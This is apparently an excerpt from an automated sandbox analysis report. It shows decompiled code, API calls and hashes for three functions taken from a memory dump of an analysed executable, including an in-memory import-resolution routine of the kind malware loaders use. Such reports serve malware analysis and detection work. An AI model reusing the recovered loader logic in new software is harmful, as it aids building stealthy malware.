                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004487DA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E004487DA() {

				 *0x46da3c = GetCommandLineA();
				 *0x46da40 = GetCommandLineW();
				return 1;
			}



                                                                                                0x004487e0
                                                                                                0x004487eb
                                                                                                0x004487f2

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CommandLine
                                                                                                • String ID: 4e
                                                                                                • API String ID: 3253501508-1107229138
                                                                                                • Opcode ID: 281d52e9a56bf2929a553eb87f062f5d35d897df23a863a322a8b5977c54aef9
                                                                                                • Instruction ID: e552b23b9d4d17b7eb096e68c915d34f22bf8b47abf63575f210da00d66cb888
                                                                                                • Opcode Fuzzy Hash: 281d52e9a56bf2929a553eb87f062f5d35d897df23a863a322a8b5977c54aef9
                                                                                                • Instruction Fuzzy Hash: DAB09278D087008FD7008FB2BC0C0043BA0BAA82073810275D402CAB62EB7480C0EF4D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00438FE6, Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00438FE6(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E00436267(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E00438932())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t56 = _t70 + 1;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E00438932())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E004447AF(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E00438932())) = 0x16;
					return E00437709() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}




























                                                                                                0x00438fe6
                                                                                                0x00438fef
                                                                                                0x00438ff4
                                                                                                0x00438ff7
                                                                                                0x00438ffb
                                                                                                0x0043900a
                                                                                                0x0043900d
                                                                                                0x0043902d
                                                                                                0x00439032
                                                                                                0x00439035
                                                                                                0x00439037
                                                                                                0x00439105
                                                                                                0x0043910b
                                                                                                0x00439120
                                                                                                0x0043912c
                                                                                                0x00439132
                                                                                                0x00439134
                                                                                                0x00439143
                                                                                                0x00439143
                                                                                                0x00439143
                                                                                                0x00439146
                                                                                                0x00439146
                                                                                                0x0043914a
                                                                                                0x0043914c
                                                                                                0x0043914f
                                                                                                0x0043914f
                                                                                                0x0043914f
                                                                                                0x0043914f
                                                                                                0x00000000
                                                                                                0x00439156
                                                                                                0x0043913b
                                                                                                0x00000000
                                                                                                0x0043913b
                                                                                                0x0043910d
                                                                                                0x00439110
                                                                                                0x00439113
                                                                                                0x00439113
                                                                                                0x00439115
                                                                                                0x00439116
                                                                                                0x00439116
                                                                                                0x0043911a
                                                                                                0x00000000
                                                                                                0x0043911a
                                                                                                0x0043903d
                                                                                                0x00439043
                                                                                                0x00439070
                                                                                                0x0043907c
                                                                                                0x00439082
                                                                                                0x00439084
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043908a
                                                                                                0x00439090
                                                                                                0x00439093
                                                                                                0x004390ef
                                                                                                0x004390f4
                                                                                                0x004390fc
                                                                                                0x00000000
                                                                                                0x004390fc
                                                                                                0x00439095
                                                                                                0x00439098
                                                                                                0x0043909a
                                                                                                0x0043909d
                                                                                                0x0043909f
                                                                                                0x004390a1
                                                                                                0x004390d7
                                                                                                0x004390e5
                                                                                                0x004390eb
                                                                                                0x004390ed
                                                                                                0x00439101
                                                                                                0x00000000
                                                                                                0x00439101
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004390a3
                                                                                                0x004390a3
                                                                                                0x004390a3
                                                                                                0x004390a6
                                                                                                0x004390a9
                                                                                                0x004390ab
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004390b5
                                                                                                0x004390bc
                                                                                                0x004390bf
                                                                                                0x004390c1
                                                                                                0x004390c9
                                                                                                0x004390c9
                                                                                                0x004390cc
                                                                                                0x004390cd
                                                                                                0x004390d0
                                                                                                0x004390d2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004390d2
                                                                                                0x004390c3
                                                                                                0x004390c4
                                                                                                0x004390c7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004390c7
                                                                                                0x004390d4
                                                                                                0x00000000
                                                                                                0x004390d4
                                                                                                0x00439045
                                                                                                0x00439047
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043904d
                                                                                                0x00439050
                                                                                                0x00439054
                                                                                                0x00439057
                                                                                                0x0043905b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00439061
                                                                                                0x00439062
                                                                                                0x00439065
                                                                                                0x00439067
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00439069
                                                                                                0x00000000
                                                                                                0x00439050
                                                                                                0x00439014
                                                                                                0x00000000
                                                                                                0x0043901f
                                                                                                0x00439001
                                                                                                0x00439007
                                                                                                0x00000000
                                                                                                0x00439007
                                                                                                0x0043915e

                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D2B), ref: 0043907C
                                                                                                • GetLastError.KERNEL32 ref: 0043908A
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004390E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1717984340-0
                                                                                                • Opcode ID: a8bb4b01031e5f259de07ad3e6efb6cfef612cd7c300ce03ef639e7485b1cfd3
                                                                                                • Instruction ID: 1a583c31ae247064c8e7ff38b9a128acea67bcf15ac989784a14c8bd4f3582ba
                                                                                                • Opcode Fuzzy Hash: a8bb4b01031e5f259de07ad3e6efb6cfef612cd7c300ce03ef639e7485b1cfd3
                                                                                                • Instruction Fuzzy Hash: CF415730600247AFEF259F65C848BBB7BB4EF09354F24516AF8586B3A1DBB48C01CB59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040F53C, Relevance: 5.1, APIs: 4, Instructions: 124COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 55%
                                                                                                			E0040F53C(intOrPtr* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed short* _v20;
				intOrPtr _t41;
				intOrPtr _t44;
				intOrPtr _t46;
				signed short _t57;
				signed int _t58;
				intOrPtr _t59;
				intOrPtr* _t60;
				void* _t64;
				void* _t66;
				intOrPtr _t68;
				intOrPtr _t76;
				intOrPtr* _t79;
				intOrPtr _t80;
				void _t81;
				signed short* _t82;
				void* _t87;
				intOrPtr* _t88;
				void* _t89;

				_t88 = __ecx;
				_t87 = 1;
				_t41 =  *__ecx;
				_t68 =  *((intOrPtr*)(__ecx + 4));
				_v12 = _t68;
				if( *((intOrPtr*)(_t41 + 0x84)) != 0) {
					_t64 =  *((intOrPtr*)(_t41 + 0x80)) + _t68;
					if(IsBadReadPtr(_t64, 0x14) == 0) {
						_t66 = _t64 + 0x10;
						while(1) {
							_t44 =  *((intOrPtr*)(_t66 - 4));
							if(_t44 == 0) {
								goto L23;
							}
							_t46 =  *((intOrPtr*)(_t88 + 0x24))(_t44 + _v12,  *((intOrPtr*)(_t88 + 0x34)));
							_v8 = _t46;
							if(_t46 == 0) {
								_push(0x7e);
								goto L22;
							} else {
								_push(4 +  *(_t88 + 0xc) * 4);
								_push( *((intOrPtr*)(_t88 + 8)));
								_t80 = E00439262();
								if(_t80 == 0) {
									 *((intOrPtr*)(_t88 + 0x2c))(_v8,  *((intOrPtr*)(_t88 + 0x34)));
									_push(0xe);
									L22:
									SetLastError();
									_t87 = 0;
								} else {
									 *((intOrPtr*)(_t88 + 8)) = _t80;
									 *((intOrPtr*)(_t80 +  *(_t88 + 0xc) * 4)) = _v8;
									 *(_t88 + 0xc) =  *(_t88 + 0xc) + 1;
									_t81 =  *(_t66 - 0x10);
									if(_t81 == 0) {
										_t81 =  *_t66;
									}
									_t82 = _t81 + _v12;
									_t76 = _v8;
									_v16 =  *_t66 + _v12;
									_v20 = _t82;
									if( *_t82 != 0) {
										while(1) {
											_t57 =  *_t82;
											_push( *((intOrPtr*)(_t88 + 0x34)));
											if(_t57 >= 0) {
												_t58 = _t57 + _v12 + 2;
											} else {
												_t58 = _t57 & 0x0000ffff;
											}
											_t59 =  *((intOrPtr*)(_t88 + 0x28))(_t76, _t58);
											_t79 = _v16;
											_t89 = _t89 + 0xc;
											 *_t79 = _t59;
											_t60 = _t79;
											_t76 = _v8;
											if( *_t60 == 0) {
												break;
											}
											_t82 =  &(_v20[2]);
											_v16 = _t60 + 4;
											_v20 = _t82;
											if( *_t82 != 0) {
												continue;
											} else {
											}
											goto L16;
										}
										_t87 = 0;
									}
									L16:
									if(_t87 == 0) {
										 *((intOrPtr*)(_t88 + 0x2c))(_t76,  *((intOrPtr*)(_t88 + 0x34)));
										SetLastError(0x7f);
									} else {
										_t66 = _t66 + 0x14;
										if(IsBadReadPtr(_t66 - 0x10, 0x14) == 0) {
											continue;
										} else {
										}
									}
								}
							}
							goto L23;
						}
					}
					L23:
				}
				return _t87;
			}

























                                                                                                0x0040f543
                                                                                                0x0040f548
                                                                                                0x0040f549
                                                                                                0x0040f54b
                                                                                                0x0040f54e
                                                                                                0x0040f558
                                                                                                0x0040f565
                                                                                                0x0040f572
                                                                                                0x0040f578
                                                                                                0x0040f57b
                                                                                                0x0040f57b
                                                                                                0x0040f580
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f58d
                                                                                                0x0040f590
                                                                                                0x0040f597
                                                                                                0x0040f66e
                                                                                                0x00000000
                                                                                                0x0040f59d
                                                                                                0x0040f5a7
                                                                                                0x0040f5a8
                                                                                                0x0040f5b0
                                                                                                0x0040f5b6
                                                                                                0x0040f665
                                                                                                0x0040f66a
                                                                                                0x0040f670
                                                                                                0x0040f670
                                                                                                0x0040f676
                                                                                                0x0040f5bc
                                                                                                0x0040f5c2
                                                                                                0x0040f5c5
                                                                                                0x0040f5c8
                                                                                                0x0040f5cb
                                                                                                0x0040f5d0
                                                                                                0x0040f5d2
                                                                                                0x0040f5d2
                                                                                                0x0040f5d4
                                                                                                0x0040f5dc
                                                                                                0x0040f5e2
                                                                                                0x0040f5e5
                                                                                                0x0040f5e8
                                                                                                0x0040f5ea
                                                                                                0x0040f5ea
                                                                                                0x0040f5ec
                                                                                                0x0040f5f1
                                                                                                0x0040f5fe
                                                                                                0x0040f5f3
                                                                                                0x0040f5f3
                                                                                                0x0040f5f3
                                                                                                0x0040f602
                                                                                                0x0040f605
                                                                                                0x0040f608
                                                                                                0x0040f60b
                                                                                                0x0040f60d
                                                                                                0x0040f60f
                                                                                                0x0040f615
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f61d
                                                                                                0x0040f620
                                                                                                0x0040f623
                                                                                                0x0040f629
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f62b
                                                                                                0x00000000
                                                                                                0x0040f629
                                                                                                0x0040f62d
                                                                                                0x0040f62d
                                                                                                0x0040f62f
                                                                                                0x0040f631
                                                                                                0x0040f650
                                                                                                0x0040f657
                                                                                                0x0040f633
                                                                                                0x0040f633
                                                                                                0x0040f644
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f64a
                                                                                                0x0040f644
                                                                                                0x0040f631
                                                                                                0x0040f5b6
                                                                                                0x00000000
                                                                                                0x0040f597
                                                                                                0x0040f57b
                                                                                                0x0040f678
                                                                                                0x0040f678
                                                                                                0x0040f680

                                                                                                APIs
                                                                                                • IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,0040F8D9), ref: 0040F56A
                                                                                                • IsBadReadPtr.KERNEL32(?,00000014,?,0040F8D9), ref: 0040F63C
                                                                                                • SetLastError.KERNEL32(0000007F), ref: 0040F657
                                                                                                • SetLastError.KERNEL32(0000007E,?,0040F8D9), ref: 0040F670
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastRead
                                                                                                • String ID:
                                                                                                • API String ID: 4100373531-0
                                                                                                • Opcode ID: bfbdaaeeb6a855a7043da24cc3e5306f65c0aa879380a81c03b067bf07681529
                                                                                                • Instruction ID: bc598a56cc7cbea7587c2d725246a16d78325328a1b5ca59c07d35cb362a55ce
                                                                                                • Opcode Fuzzy Hash: bfbdaaeeb6a855a7043da24cc3e5306f65c0aa879380a81c03b067bf07681529
                                                                                                • Instruction Fuzzy Hash: 8041A971A00200EFEB248F69D844B6AB7B5FF84301F20887AE406A7A91D736E905CB18
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%